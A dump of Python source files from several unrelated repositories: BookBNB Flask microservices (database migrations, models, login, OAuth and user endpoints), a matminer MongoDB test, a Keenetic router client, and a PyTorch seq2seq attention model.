default=BlockChainStatus.UNSET.value,
server_default=BlockChainStatus.UNSET.value,
),
)
op.add_column(
'publication',
sa.Column('blockchain_transaction_hash', sa.String(length=512), nullable=True),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('publication', 'blockchain_transaction_hash')
op.drop_column('publication', 'blockchain_status')
op.drop_column('publication', 'blockchain_id')
pp.execute("DROP TYPE blockchain_status")
# ### end Alembic commands ###
```
#### File: publications-microservice/publications_microservice/models.py
```python
from uuid import uuid4
from flask_sqlalchemy import SQLAlchemy
from geoalchemy2.types import Geography
from sqlalchemy.sql import func
from sqlalchemy_utils import UUIDType
from publications_microservice.constants import BlockChainStatus
db = SQLAlchemy()
class Publication(db.Model): # type: ignore
"""Publications model."""
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, nullable=False)
title = db.Column(db.String)
description = db.Column(db.String)
rooms = db.Column(
db.Integer, db.CheckConstraint('rooms >= 0', name='rooms_nonnegative')
)
beds = db.Column(
db.Integer, db.CheckConstraint('beds >= 0', name='beds_nonnegative')
)
bathrooms = db.Column(
db.Integer, db.CheckConstraint('bathrooms >= 0', name='bathrooms_nonnegative')
)
price_per_night = db.Column(
db.Numeric,
db.CheckConstraint('price_per_night > 0', name='price_per_night_nonnegative'),
)
loc = db.Column(Geography(geometry_type='POINT', srid=4326))
publication_date = db.Column(db.DateTime, nullable=False, default=func.now())
blocked = db.Column(db.Boolean, default=False)
blockchain_status = db.Column(
db.Enum(BlockChainStatus), nullable=False, default=BlockChainStatus.UNSET.value,
)
blockchain_transaction_hash = db.Column(db.String(512), nullable=True)
blockchain_id = db.Column(db.Integer, nullable=True)
images = db.relationship("PublicationImage", backref="publication", lazy=True)
questions = db.relationship("PublicationQuestion", backref="publication", lazy=True)
stars = db.relationship("PublicationStar", backref="publication", lazy=True)
def update_from_dict(self, **kwargs):
for field, value in kwargs.items():
setattr(self, field, value)
class PublicationImage(db.Model): # type: ignore
"""Images for publications."""
id = db.Column(UUIDType(binary=False), primary_key=True, default=uuid4)
url = db.Column(db.String, nullable=False)
publication_id = db.Column(
db.Integer, db.ForeignKey('publication.id'), nullable=False
)
# TODO: validate URLs
class PublicationQuestion(db.Model): # type: ignore
"""Public questions for publications."""
id = db.Column(db.Integer, primary_key=True)
question = db.Column(db.String, nullable=False)
reply = db.Column(db.String, nullable=True)
created_at = db.Column(db.DateTime, nullable=False, default=func.now())
replied_at = db.Column(db.DateTime, nullable=True)
user_id = db.Column(db.Integer, nullable=False)
publication_id = db.Column(
db.Integer, db.ForeignKey('publication.id'), nullable=False
)
class PublicationStar(db.Model): # type: ignore
"""Publication stars."""
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, nullable=False)
created_at = db.Column(db.DateTime, nullable=False, default=func.now())
publication_id = db.Column(
db.Integer, db.ForeignKey('publication.id'), nullable=False
)
``` |
{
"source": "7552-2020C2-grupo5/recommendations_microservice",
"score": 2
} |
#### File: recommendations_microservice/recommendations_microservice/app.py
```python
import logging
from pathlib import Path
import requests
from flask import Flask, request
from flask_cors import CORS
from flask_migrate import Migrate
from werkzeug.middleware.proxy_fix import ProxyFix
from recommendations_microservice.api import api
from recommendations_microservice.cfg import config
from recommendations_microservice.constants import DEFAULT_VERIFICATION_URL
from recommendations_microservice.models import db
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def fix_dialect(s):
if s.startswith("postgres://"):
s = s.replace("postgres://", "postgresql://")
s = s.replace("postgresql://", "postgresql+psycopg2://")
return s
def before_request():
excluded_paths = [
"/",
"/v1/swagger.json",
"/swagger.json",
"/swaggerui/favicon-32x32.png",
"/swaggerui/swagger-ui-standalone-preset.js",
"/swaggerui/swagger-ui-standalone-preset.js",
"/swaggerui/swagger-ui-bundle.js",
"/swaggerui/swagger-ui.css",
"/swaggerui/droid-sans.css",
]
if (
config.env(default="DEV") == "DEV"
or request.path in excluded_paths
or request.method == "OPTIONS"
):
return
bookbnb_token = request.headers.get("BookBNBAuthorization")
if bookbnb_token is None:
return {"message": "BookBNB token is missing"}, 401
r = requests.post(
config.token_verification_url(default=DEFAULT_VERIFICATION_URL),
json={"token": bookbnb_token},
headers={"BookBNBAuthorization": config.bookbnb_token(default="_")},
)
if not r.ok:
return {"message": "Invalid BookBNB token"}, 401
def create_app(test_db=None):
"""creates a new app instance"""
new_app = Flask(__name__)
new_app.config["SQLALCHEMY_DATABASE_URI"] = config.database.url(
default=test_db or "sqlite:///recommendations_microservice.db", cast=fix_dialect
)
new_app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
new_app.config["ERROR_404_HELP"] = False
db.init_app(new_app)
api.init_app(new_app)
Migrate(new_app, db, directory=Path(__file__).parent / "migrations")
new_app.wsgi_app = ProxyFix(
new_app.wsgi_app, x_for=1, x_proto=1, x_host=1, x_port=1
) # remove after flask-restx > 0.2.0 is released
# https://github.com/python-restx/flask-restx/issues/230
CORS(new_app)
new_app.before_request(before_request)
return new_app
``` |
{
"source": "7552-2020C2-grupo5/users-microservice",
"score": 3
} |
#### File: users_microservice/controllers/oauth.py
```python
import logging
import jwt
import requests
from jwt import PyJWKClient
from users_microservice.cfg import config
from users_microservice.constants import (
DEFAULT_AUDIENCE,
DEFAULT_GOOGLE_OPENID_CFG_JWKS_KEY,
DEFAULT_GOOGLE_OPENID_CFG_URI,
)
from users_microservice.exceptions import EmailAlreadyRegistered
from users_microservice.models import User, db
from users_microservice.utils import split_list
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def validated_token(token, verify=True):
"""Validate a token and return decoded token."""
url = (
requests.get(
config.oauth.google_openid_config_uri(default=DEFAULT_GOOGLE_OPENID_CFG_URI)
)
.json()
.get(
config.oauth.google_openid_jkws_key(
default=DEFAULT_GOOGLE_OPENID_CFG_JWKS_KEY
)
)
)
logger.info("JWK url is %s", url)
jwks_client = PyJWKClient(url)
signing_key = jwks_client.get_signing_key_from_jwt(token)
data = jwt.decode(
token,
signing_key.key,
algorithms=["RS256"],
audience=config.oauth.audience(default=DEFAULT_AUDIENCE, cast=split_list),
options={"verify_signature": verify},
)
return data
def oauth_user(token):
"""Get user from token."""
decoded_token = validated_token(token, False)
user = User.query.filter(User.email == decoded_token["email"]).first()
return user
def create_oauth_user(token, wallet_address, wallet_mnemonic):
"""Create a new user from OAuth token."""
if oauth_user(token) is not None:
raise EmailAlreadyRegistered
data = validated_token(token)
new_user_data = {
"first_name": data["given_name"],
"last_name": data["family_name"],
"password": data["sub"],
"profile_picture": data["picture"],
"wallet_address": wallet_address,
"wallet_mnemonic": wallet_mnemonic,
"email": data["email"],
}
new_user = User(**new_user_data)
db.session.add(new_user)
db.session.commit()
return new_user
```
#### File: migrations/versions/e792232e04c7_add_admin_model.py
```python
from datetime import datetime as dt
from alembic import op
import sqlalchemy as sa
import sqlalchemy_utils
from users_microservice.models import AdminUser
# revision identifiers, used by Alembic.
revision = 'e792232e04c7'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
admin_user_table = op.create_table(
'admin_user',
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('first_name', sa.String(), nullable=False),
sa.Column('last_name', sa.String(), nullable=False),
sa.Column('_password', sa.String(), nullable=False),
sa.Column(
'email', sqlalchemy_utils.types.email.EmailType(length=255), nullable=False
),
sa.Column('register_date', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email'),
)
op.bulk_insert(
admin_user_table,
[
{
"first_name": "Admin",
"last_name": "BookBNB",
"_password": <PASSWORD>User._hash_pasword("<PASSWORD>"),
"email": "<EMAIL>",
"register_date": dt.now(),
}
],
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('admin_user')
# ### end Alembic commands ###
```
#### File: users_microservice/namespaces/users.py
```python
import operator as ops
import jwt
import sendgrid
from email_validator import EmailNotValidError
from flask_restx import Model, Namespace, Resource, fields, marshal, reqparse
from sendgrid.helpers.mail import Content, Email, Mail, To
from users_microservice import __version__
from users_microservice.cfg import config
from users_microservice.constants import DEFAULT_RESET_PWD_EMAIL, DEFAULT_RESET_PWD_LEN
from users_microservice.exceptions import (
BlockedUser,
EmailAlreadyRegistered,
PasswordDoesNotMatch,
UserDoesNotExist,
)
from users_microservice.models import BlacklistToken, User, db
from users_microservice.utils import FilterParam, generate_random_password
api = Namespace("Users", description="Users operations",)
auth_parser = api.parser()
auth_parser.add_argument('Authorization', type=str, location='headers', required=True)
@api.errorhandler(UserDoesNotExist)
def handle_user_does_not_exist(_error: UserDoesNotExist):
"""Handle missing user errors."""
return {"message": "User does not exist"}, 404
@api.errorhandler(BlockedUser)
def handle_blocked_user(_error: BlockedUser):
"""Handle blocked users."""
return {"message": "User has been blocked"}, 403
base_user_model = Model(
"User base model",
{
"id": fields.Integer(readonly=True, description="The user unique identifier"),
"first_name": fields.String(required=True, description='The user first name'),
"last_name": fields.String(required=True, description='The user last name'),
"profile_picture": fields.String(
required=False, description="URL pointing to the user's profile picture"
),
"email": fields.String(required=True, description='The user email'),
},
)
edit_model = api.model(
"User edit model",
{
"first_name": fields.String(required=False, description='The user first name'),
"last_name": fields.String(required=False, description='The user last name'),
"profile_picture": fields.String(
required=False, description="URL pointing to the user's profile picture"
),
},
)
profile_model = base_user_model.clone(
"User profile model",
{
"register_date": fields.DateTime(
description='The date the user joined bookbnb'
),
"blocked": fields.Boolean(description="Is blocked?"),
},
)
api.models[profile_model.name] = profile_model
register_model = base_user_model.clone(
"User register model",
{
"password": fields.String(
required=True, description='The password for the new user'
),
"wallet_address": fields.String(
required=True, description='The wallet address for the new user'
),
"wallet_mnemonic": fields.String(
required=True, description='The wallet mnemonic for the new user'
),
},
)
api.models[register_model.name] = register_model
registered_model = profile_model.clone(
"New user model",
{
"token": fields.String(
required=True, attribute='password', description='The jwt'
)
},
)
api.models[registered_model.name] = registered_model
login_model = api.model(
"User login model",
{
"email": fields.String(required=True, description='The user email'),
"password": fields.String(required=True, description='The user password'),
},
)
wallet_model = api.model(
"User Wallet Model", {"address": fields.String(description="The wallet address")},
)
password_reset_model = api.model(
"Reset password model",
{"email": fields.String(required=True, description="The user email")},
)
api.models[password_reset_model.name] = password_reset_model
logged_model = api.model("Logged in User model", {"token": fields.String})
error_model = api.model("Error Model", {"message": fields.String})
user_parser = reqparse.RequestParser()
user_parser.add_argument(
"first_name",
type=FilterParam("first_name", ops.contains, schema=str),
help="First name to filter on",
store_missing=False,
)
user_parser.add_argument(
"last_name",
type=FilterParam("last_name", ops.contains, schema=str),
help="Last name to filter on",
store_missing=False,
)
user_parser.add_argument(
"email",
type=FilterParam("email", ops.contains, schema=str),
help="Email to filter on",
store_missing=False,
)
def conditional_filter(attr, val):
if val == True: # noqa: E712
return attr == False # noqa: E712
else:
return 1 == 1
user_parser.add_argument(
"filter_blocked",
type=FilterParam(
"filter_blocked",
conditional_filter,
attribute="blocked",
schema=bool,
transform={"true": True, "false": False}.get,
),
store_missing=True,
default="true",
)
@api.route('')
class UserListResource(Resource):
@api.doc('list_users_profiles')
@api.marshal_list_with(profile_model)
@api.expect(user_parser)
def get(self):
"""Get all users."""
params = user_parser.parse_args()
query = User.query
for filter_name, filter_op in params.items():
if not isinstance(filter_op, FilterParam):
if filter_op is None:
continue
for i in user_parser.args:
if i.name == filter_name:
filter_op = i.type(filter_op)
break
if not isinstance(filter_op, FilterParam):
continue
query = filter_op.apply(query, User)
return query.all()
@api.doc('user_register')
@api.expect(register_model)
@api.response(201, 'Successfully registered', model=registered_model)
@api.response(409, 'User already registered')
@api.response(400, 'Invalid email')
def post(self):
try:
new_user = User(**api.payload)
db.session.add(new_user)
db.session.commit()
return api.marshal(new_user, registered_model), 201
except EmailAlreadyRegistered:
return {"message": "The email has already been registered."}, 409
except EmailNotValidError:
return {"message": "The email is not valid"}, 400
@api.route('/<int:user_id>')
@api.param('user_id', 'The user unique identifier')
@api.response(404, 'User not found')
@api.response(403, 'User is blocked')
class UserResource(Resource):
@api.doc('get_user_profile_by_id')
@api.marshal_with(profile_model)
def get(self, user_id):
"""Get a user by id."""
user = User.query.filter(User.id == user_id).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
return user
@api.expect(edit_model)
@api.marshal_with(profile_model)
def put(self, user_id):
"""Replace a user by id."""
user = User.query.filter(User.id == user_id).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
user.update_from_dict(**api.payload)
db.session.merge(user)
db.session.commit()
return user
@api.doc('block_user')
@api.response(200, "User correctly blocked")
def delete(self, user_id):
"""Block a user by id."""
user = User.query.filter(User.id == user_id).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
user.blocked = True
db.session.merge(user)
blocked_token = BlacklistToken(token=user.jwt)
db.session.add(blocked_token)
db.session.commit()
return {"message": "The user has been blocked"}, 200
@api.route('/reset_password')
@api.response(201, 'Success')
@api.response(404, 'User not found')
@api.response(403, 'User is blocked')
class ResetPasswordResource(Resource):
@api.expect(password_reset_model)
def post(self):
"""Reset user password"""
email = api.payload["email"]
user = User.query.filter(User.email == email).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
new_pass = generate_random_password(DEFAULT_RESET_PWD_LEN)
user.password = <PASSWORD>
db.session.merge(user)
db.session.commit()
sg = sendgrid.SendGridAPIClient(api_key=config.sendgrid.api_key())
email = config.reset_pwd_email(default=DEFAULT_RESET_PWD_EMAIL)
from_email = Email(email)
to_email = To(user.email)
subject = "BookBNB - Password Reset"
content_body = f"Your password has been reset. Your new password is: {<PASSWORD>}"
content = Content("text/plain", content_body)
mail = Mail(from_email, to_email, subject, content)
mail_json = mail.get()
sg.client.mail.send.post(request_body=mail_json)
return {"status": "success"}, 201
@api.route('/validate_token')
class UserTokenValidatorResource(Resource):
"""User Token Validator"""
@api.doc('validate_user_token')
@api.expect(auth_parser)
@api.response(200, "Success")
@api.response(401, "Invalid token")
@api.response(400, "Malformed token")
@api.response(403, "Blocked user")
def get(self):
parser_args = auth_parser.parse_args()
auth_token = parser_args.Authorization
try:
role = User.decode_auth_token_role(auth_token)
if role != 'user':
raise jwt.InvalidTokenError("Is not user")
user_id = User.decode_auth_token(auth_token)
user = User.query.filter(User.id == user_id).first()
if user.blocked:
raise BlockedUser
if user is None:
raise UserDoesNotExist
return {"status": "success"}, 200
except jwt.DecodeError:
return {"message": "The token sent was malformed."}, 400
except (jwt.ExpiredSignatureError, jwt.InvalidTokenError,) as e:
return {"message": str(e)}, 401
@api.route('/login')
class LoginResource(Resource):
"""User Login Resource"""
@api.expect(login_model)
@api.doc('user_login')
@api.response(201, "Success")
@api.response(401, "Invalid credentials")
@api.response(403, "User is blocked")
def post(self):
user = User.query.filter(User.email == api.payload['email']).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
try:
return (
marshal({"token": User.check_password(**api.payload)}, logged_model),
201,
)
except PasswordDoesNotMatch:
return {"message": "Password does not match."}, 401
@api.route('/logout')
class LogoutResource(Resource):
"""User Logout Resource."""
@api.doc('user_logout')
@api.expect(auth_parser)
@api.response(201, "Success")
@api.response(401, "Invalid token")
def post(self):
parser_args = auth_parser.parse_args()
auth_token = parser_args.Authorization
try:
User.decode_auth_token(auth_token)
blacklist_token = BlacklistToken(token=auth_token)
db.session.add(blacklist_token)
db.session.commit()
return {'status': 'success', 'message': 'Successfully logged out.'}, 201
except jwt.ExpiredSignatureError:
return {"message": "Signature expired. Please log in again."}, 401
except jwt.InvalidTokenError:
return {"message": "Invalid token. Please log in again."}, 401
@api.route('/wallet/<int:user_id>')
class WalletResource(Resource):
"""User Wallet Resource."""
@api.doc('user_wallet')
@api.response(code=200, model=wallet_model, description='Success')
@api.response(code=404, model=error_model, description='User Not Found')
@api.response(code=403, model=error_model, description='User Blocked')
def get(self, user_id):
user = User.query.filter(User.id == user_id).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
response = {"address": user.wallet_address}
return response, 200
``` |
{
"source": "755452800/matminer",
"score": 2
} |
#### File: data_retrieval/tests/test_retrieve_MongoDB.py
```python
import unittest
from pymongo import MongoClient
from pymatgen.util.testing import PymatgenTest
from matminer.data_retrieval.retrieve_MongoDB import clean_projection, remove_ints, MongoDataRetrieval
from matminer.data_retrieval.tests.base import on_ci
class MongoDataRetrievalTest(PymatgenTest):
def test_cleaned_projection(self):
p = ["n.o.e", "n.o.e.l", "a.b", "a.b.c", "m", "m.b"]
result = clean_projection(p)
self.assertEqual(set(result), {"a.b", "m", "n.o.e"})
p = ["d.x", "d.y", "d.z", "a.b.c", "a.b.d.e", "m.n.x", "m.l.x"]
result = clean_projection(p)
self.assertEqual(set(result), {"d", "a.b", "m"})
def test_remove_ints(self):
self.assertEqual(remove_ints("a.1"), "a")
self.assertEqual(remove_ints("a.1.x"), "a.x")
@unittest.skipIf(not on_ci, "MongoDataRetrievalTest configured only to run on CI by default")
def test_get_dataframe(self):
db = MongoClient("localhost", 27017, username="admin", password="password").test_db
c = db.test_collection
docs = [
{
"some": {"nested": {"result": 14.5}},
"other": "notnestedresult",
"final": 16.938475 + i,
"array": [1.4, 5.6, 11.2, 1.1],
"valid": True,
}
for i in range(5)
]
docs[-1]["valid"] = False
c.insert_many(docs)
mdr = MongoDataRetrieval(c)
df = mdr.get_dataframe(
criteria={"valid": True}, properties=["some.nested.result", "other", "final", "array", "valid"]
)
self.assertTrue((df["some.nested.result"] == 14.5).all())
self.assertTrue((df["other"] == "notnestedresult").all())
floats = df["final"] != 16.938475
self.assertTrue(floats.any() and not floats.all())
self.assertArrayAlmostEqual(df["array"].iloc[0], [1.4, 5.6, 11.2, 1.1])
self.assertTrue(df["valid"].all())
c.drop()
``` |
{
"source": "755/python_ndms2_client",
"score": 3
} |
#### File: python_ndms2_client/ndms2_client/client.py
```python
import logging
import re
from collections import namedtuple
from typing import Dict, List
from .connection import Connection
_LOGGER = logging.getLogger(__name__)
_ARP_CMD = 'show ip arp'
_ASSOCIATIONS_CMD = 'show associations'
_HOTSPOT_CMD = 'show ip hotspot'
_INTERFACE_CMD = 'show interface %s'
_ARP_REGEX = re.compile(
r'(?P<name>([^ ]+))?\s+' +
r'(?P<ip>([0-9]{1,3}[.]){3}[0-9]{1,3})?\s+' +
r'(?P<mac>(([0-9a-f]{2}[:-]){5}([0-9a-f]{2})))\s+' +
r'(?P<interface>([^ ]+))\s+'
)
Device = namedtuple('Device', ['mac', 'name', 'ip', 'interface'])
class Client(object):
def __init__(self, connection: Connection):
self._connection = connection
def get_devices(self, include_arp=True, include_associated=True) -> List[Device]:
devices = []
if include_arp:
devices = _merge_devices(devices, self.get_arp_devices())
if include_associated:
devices = _merge_devices(devices, self.get_associated_devices())
return devices
def get_arp_devices(self) -> List[Device]:
lines = self._connection.run_command(_ARP_CMD)
result = _parse_table_lines(lines, _ARP_REGEX)
return [Device(
mac=info.get('mac').upper(),
name=info.get('name'),
ip=info.get('ip'),
interface=info.get('interface')
) for info in result if info.get('mac') is not None]
def get_associated_devices(self):
associations = _parse_dict_lines(self._connection.run_command(_ASSOCIATIONS_CMD))
items = associations.get('station', [])
if not isinstance(items, list):
items = [items]
aps = set([info.get('ap') for info in items])
ap_to_bridge = {}
for ap in aps:
ap_info = _parse_dict_lines(self._connection.run_command(_INTERFACE_CMD % ap))
ap_to_bridge[ap] = ap_info.get('group') or ap_info.get('interface-name')
hotspot_info = self.__get_hotpot_info()
devices = []
for info in items:
mac = info.get('mac')
if mac is not None and info.get('authenticated') in ['1', 'yes']:
host_info = hotspot_info.get(mac)
devices.append(Device(
mac=mac.upper(),
name=host_info.get('name') if host_info else None,
ip=host_info.get('ip') if host_info else None,
interface=ap_to_bridge.get(info.get('ap'), info.get('ap'))
))
return devices
# hotspot info is only available in newest firmware
# however on older firmware missing command error will lead to empty dict returned
def __get_hotpot_info(self):
info = _parse_dict_lines(self._connection.run_command(_HOTSPOT_CMD))
items = info.get('host', [])
if not isinstance(items, list):
items = [items]
return {item.get('mac'): item for item in items}
def _merge_devices(left: List[Device], right: List[Device]) -> List[Device]:
existing_macs = set([d.mac for d in left])
return left + [d for d in right if d.mac not in existing_macs]
def _parse_table_lines(lines: List[str], regex: re) -> List[Dict[str, any]]:
"""Parse the lines using the given regular expression.
If a line can't be parsed it is logged and skipped in the output.
"""
results = []
for line in lines:
match = regex.search(line)
if not match:
_LOGGER.debug("Could not parse line: %s", line)
continue
results.append(match.groupdict())
return results
def _parse_dict_lines(lines: List[str]) -> Dict[str, any]:
response = {}
stack = [(None, response)]
stack_level = 0
indent = 0
for line in lines:
if len(line.strip()) == 0:
continue
# exploding the line
colon_pos = line.index(':')
comma_pos = line.index(',') if ',' in line else None
key = line[:colon_pos].strip()
value = line[(colon_pos + 1):].strip()
new_indent = comma_pos if comma_pos is not None and comma_pos < colon_pos else colon_pos
# assuming line is like 'mac-access, id = Bridge0: ...'
if comma_pos is not None and comma_pos < colon_pos:
key = line[:comma_pos].strip()
value = {key: value} if value != '' else {}
args = line[comma_pos + 1:colon_pos].split(',')
for arg in args:
sub_key, sub_value = [p.strip() for p in arg.split('=', 1)]
value[sub_key] = sub_value
# up and down the stack
if new_indent > indent: # new line is a sub-value of parent
stack_level += 1
stack.append(None)
elif new_indent < indent: # getting one level up
stack_level -= 1
stack.pop()
if stack_level < 1:
break
indent = new_indent
stack[stack_level] = key, value
# current containing object
obj_key, obj = stack[stack_level - 1]
# we are the first child of the containing object
if not isinstance(obj, dict):
# need to convert it from empty string to empty object
assert obj == ''
_, parent_obj = stack[stack_level - 2]
obj = {}
# containing object might be in a list also
if isinstance(parent_obj[obj_key], list):
parent_obj[obj_key].pop()
parent_obj[obj_key].append(obj)
else:
parent_obj[obj_key] = obj
stack[stack_level - 1] = obj_key, obj
# current key is already in object means there should be an array of values
if key in obj:
if not isinstance(obj[key], list):
obj[key] = [obj[key]]
obj[key].append(value)
else:
obj[key] = value
return response
``` |
{
"source": "7568/7568.github.io",
"score": 2
} |
#### File: codes/text-process/2021-11-13-seq2seqModel-paddedSequences-masking.py
```python
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torchtext.datasets import Multi30k
from torchtext.data import Field, BucketIterator
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import spacy
import numpy as np
import random
import math
import time
import os
os.environ["CUDA_VISIBLE_DEVICES"]='1'
SEED = 1234
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
torch.backends.cudnn.deterministic = True
spacy_de = spacy.load('de_core_news_sm')
spacy_en = spacy.load('en_core_web_sm')
def tokenize_de(text):
"""
Tokenizes German text from a string into a list of strings
"""
return [tok.text for tok in spacy_de.tokenizer(text)]
def tokenize_en(text):
"""
Tokenizes English text from a string into a list of strings
"""
return [tok.text for tok in spacy_en.tokenizer(text)]
SRC = Field(tokenize = tokenize_de,
init_token = '<sos>',
eos_token = '<eos>',
lower = True,
include_lengths = True)
TRG = Field(tokenize = tokenize_en,
init_token = '<sos>',
eos_token = '<eos>',
lower = True)
train_data, valid_data, test_data = Multi30k.splits(exts = ('.de', '.en'),
fields = (SRC, TRG))
SRC.build_vocab(train_data, min_freq = 2)
TRG.build_vocab(train_data, min_freq = 2)
BATCH_SIZE = 128
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
train_iterator, valid_iterator, test_iterator = BucketIterator.splits(
(train_data, valid_data, test_data),
batch_size = BATCH_SIZE,
sort_within_batch = True,
sort_key = lambda x : len(x.src),
device = device)
class Encoder(nn.Module):
def __init__(self, input_dim, emb_dim, enc_hid_dim, dec_hid_dim, dropout):
super().__init__()
self.embedding = nn.Embedding(input_dim, emb_dim)
self.rnn = nn.GRU(emb_dim, enc_hid_dim, bidirectional=True)
self.fc = nn.Linear(enc_hid_dim * 2, dec_hid_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, src, src_len):
# src = [src len, batch size]
# src_len = [batch size]
embedded = self.dropout(self.embedding(src))
# embedded = [src len, batch size, emb dim]
# need to explicitly put lengths on cpu!
packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, src_len.to('cpu'))
packed_outputs, hidden = self.rnn(packed_embedded)
# packed_outputs is a packed sequence containing all hidden states
# hidden is now from the final non-padded element in the batch
outputs, _ = nn.utils.rnn.pad_packed_sequence(packed_outputs)
# outputs is now a non-packed sequence, all hidden states obtained
# when the input is a pad token are all zeros
# outputs = [src len, batch size, hid dim * num directions]
# hidden = [n layers * num directions, batch size, hid dim]
# hidden is stacked [forward_1, backward_1, forward_2, backward_2, ...]
# outputs are always from the last layer
# hidden [-2, :, : ] is the last of the forwards RNN
# hidden [-1, :, : ] is the last of the backwards RNN
# initial decoder hidden is final hidden state of the forwards and backwards
# encoder RNNs fed through a linear layer
hidden = torch.tanh(self.fc(torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)))
# outputs = [src len, batch size, enc hid dim * 2]
# hidden = [batch size, dec hid dim]
return outputs, hidden
class Attention(nn.Module):
def __init__(self, enc_hid_dim, dec_hid_dim):
super().__init__()
self.attn = nn.Linear((enc_hid_dim * 2) + dec_hid_dim, dec_hid_dim)
self.v = nn.Linear(dec_hid_dim, 1, bias=False)
def forward(self, hidden, encoder_outputs, mask):
# hidden = [batch size, dec hid dim]
# encoder_outputs = [src len, batch size, enc hid dim * 2]
batch_size = encoder_outputs.shape[1]
src_len = encoder_outputs.shape[0]
# repeat decoder hidden state src_len times
hidden = hidden.unsqueeze(1).repeat(1, src_len, 1)
encoder_outputs = encoder_outputs.permute(1, 0, 2)
# hidden = [batch size, src len, dec hid dim]
# encoder_outputs = [batch size, src len, enc hid dim * 2]
energy = torch.tanh(self.attn(torch.cat((hidden, encoder_outputs), dim=2)))
# energy = [batch size, src len, dec hid dim]
attention = self.v(energy).squeeze(2)
# attention = [batch size, src len]
attention = attention.masked_fill(mask == 0, -1e10)
return F.softmax(attention, dim=1)
class Decoder(nn.Module):
def __init__(self, output_dim, emb_dim, enc_hid_dim, dec_hid_dim, dropout, attention):
super().__init__()
self.output_dim = output_dim
self.attention = attention
self.embedding = nn.Embedding(output_dim, emb_dim)
self.rnn = nn.GRU((enc_hid_dim * 2) + emb_dim, dec_hid_dim)
self.fc_out = nn.Linear((enc_hid_dim * 2) + dec_hid_dim + emb_dim, output_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, input, hidden, encoder_outputs, mask):
# input = [batch size]
# hidden = [batch size, dec hid dim]
# encoder_outputs = [src len, batch size, enc hid dim * 2]
# mask = [batch size, src len]
input = input.unsqueeze(0)
# input = [1, batch size]
embedded = self.dropout(self.embedding(input))
# embedded = [1, batch size, emb dim]
a = self.attention(hidden, encoder_outputs, mask)
# a = [batch size, src len]
a = a.unsqueeze(1)
# a = [batch size, 1, src len]
encoder_outputs = encoder_outputs.permute(1, 0, 2)
# encoder_outputs = [batch size, src len, enc hid dim * 2]
weighted = torch.bmm(a, encoder_outputs)
# weighted = [batch size, 1, enc hid dim * 2]
weighted = weighted.permute(1, 0, 2)
# weighted = [1, batch size, enc hid dim * 2]
rnn_input = torch.cat((embedded, weighted), dim=2)
# rnn_input = [1, batch size, (enc hid dim * 2) + emb dim]
output, hidden = self.rnn(rnn_input, hidden.unsqueeze(0))
# output = [seq len, batch size, dec hid dim * n directions]
# hidden = [n layers * n directions, batch size, dec hid dim]
# seq len, n layers and n directions will always be 1 in this decoder, therefore:
# output = [1, batch size, dec hid dim]
# hidden = [1, batch size, dec hid dim]
# this also means that output == hidden
assert (output == hidden).all()
embedded = embedded.squeeze(0)
output = output.squeeze(0)
weighted = weighted.squeeze(0)
prediction = self.fc_out(torch.cat((output, weighted, embedded), dim=1))
# prediction = [batch size, output dim]
return prediction, hidden.squeeze(0), a.squeeze(1)
class Seq2Seq(nn.Module):
def __init__(self, encoder, decoder, src_pad_idx, device):
super().__init__()
self.encoder = encoder
self.decoder = decoder
self.src_pad_idx = src_pad_idx
self.device = device
def create_mask(self, src):
mask = (src != self.src_pad_idx).permute(1, 0)
return mask
def forward(self, src, src_len, trg, teacher_forcing_ratio=0.5):
# src = [src len, batch size]
# src_len = [batch size]
# trg = [trg len, batch size]
# teacher_forcing_ratio is probability to use teacher forcing
# e.g. if teacher_forcing_ratio is 0.75 we use teacher forcing 75% of the time
batch_size = src.shape[1]
trg_len = trg.shape[0]
trg_vocab_size = self.decoder.output_dim
# tensor to store decoder outputs
outputs = torch.zeros(trg_len, batch_size, trg_vocab_size).to(self.device)
# encoder_outputs is all hidden states of the input sequence, back and forwards
# hidden is the final forward and backward hidden states, passed through a linear layer
encoder_outputs, hidden = self.encoder(src, src_len)
# first input to the decoder is the <sos> tokens
input = trg[0, :]
mask = self.create_mask(src)
# mask = [batch size, src len]
for t in range(1, trg_len):
# insert input token embedding, previous hidden state, all encoder hidden states
# and mask
# receive output tensor (predictions) and new hidden state
output, hidden, _ = self.decoder(input, hidden, encoder_outputs, mask)
# place predictions in a tensor holding predictions for each token
outputs[t] = output
# decide if we are going to use teacher forcing or not
teacher_force = random.random() < teacher_forcing_ratio
# get the highest predicted token from our predictions
top1 = output.argmax(1)
# if teacher forcing, use actual next token as next input
# if not, use predicted token
input = trg[t] if teacher_force else top1
return outputs
INPUT_DIM = len(SRC.vocab)
OUTPUT_DIM = len(TRG.vocab)
ENC_EMB_DIM = 256
DEC_EMB_DIM = 256
ENC_HID_DIM = 512
DEC_HID_DIM = 512
ENC_DROPOUT = 0.5
DEC_DROPOUT = 0.5
SRC_PAD_IDX = SRC.vocab.stoi[SRC.pad_token]
